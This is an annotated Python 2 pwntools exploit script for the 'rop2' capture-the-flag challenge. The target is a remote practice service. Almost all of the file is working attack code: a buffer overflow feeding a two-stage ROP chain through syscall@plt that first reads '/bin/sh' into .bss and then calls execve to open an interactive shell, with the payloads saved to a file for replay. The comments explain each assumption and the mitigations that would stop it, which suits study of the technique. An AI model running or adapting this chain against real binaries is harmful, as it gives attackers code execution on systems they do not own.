#!/usr/bin/env python2
# Exploit script (Python 2 + pwntools) for the "rop2" CTF challenge: a two-stage
# ROP chain whose addresses are read straight out of the local ./rop2 binary.
# Annotated for study: each stage notes the assumption it rests on and the
# mitigation that would defeat it.
#
# Python 2 only: payloads mix str literals with p32() output, which works
# because str is bytes in Python 2; under Python 3 the concatenation fails.
from pwn import *
from LibcSearcher import *  # NOTE(review): imported but never used below
from struct import pack  # NOTE(review): unused; p32() from pwntools is used instead
import os  # NOTE(review): unused

# 32-bit Linux target; log_level="debug" echoes every byte sent and received.
context(arch = "i386",os = "linux", log_level = "debug")

# Remote challenge service; the commented-out process() line is the local
# variant used when testing against ./rop2 directly.
p = remote("hackme.inndy.tw", 7703)
#p = process('./rop2')
# No leak step precedes address use, so the chain presumably assumes ./rop2 is
# not PIE (fixed PLT, symbol and .bss addresses). PIE + ASLR would break it.
elf = ELF('./rop2')

syscall_plt = elf.plt['syscall']    # the binary imports syscall(); its PLT stub is the only "gadget" used
overflow_func = elf.sym['overflow'] # NOTE(review): resolved but never referenced
main_func = elf.sym['main']         # return target after each syscall, so the overflow can be triggered again
bss_buf = elf.bss()                 # writable, fixed-address scratch buffer in the binary

p.recvuntil("ropchain:")
# Stage 1. Layout after the 0xc-byte filler: one dword (0, presumably the saved
# ebp), then the saved return address overwritten with syscall@plt, then the
# fake frame syscall@plt will see: [return -> main][3][0][bss_buf][1024].
# On i386 Linux syscall number 3 is read, i.e. read(0, bss_buf, 1024).
# A stack canary between the buffer and the saved return would break this stage.
payload1 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(3)+p32(0)+p32(bss_buf)+p32(1024)
p.sendline(payload1)

# Consumed by the read() from stage 1 and stored in .bss for stage 2.
payload2 = "/bin/sh\x00"
p.sendline(payload2)

# main() re-runs after the syscall returns, so the prompt appears again.
p.recvuntil("ropchain:")
# Stage 2. Same frame shape, now syscall(11, bss_buf, 0, 0); number 11 is
# execve on i386, so this is execve(bss_buf, NULL, NULL) with the string
# written in stage 1.
payload3 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(11)+p32(bss_buf)+p32(0)+p32(0)
p.sendline(payload3)

# Persist the three inputs, newline-terminated like sendline() sends them,
# so the session can be replayed without this script.
with open("poc.txt", "w") as f:
    f.write(payload1)
    f.write("\n")
    f.write(payload2)
    f.write("\n")
    f.write(payload3)
    f.write("\n")

# Hand the connection over to the terminal.
p.interactive()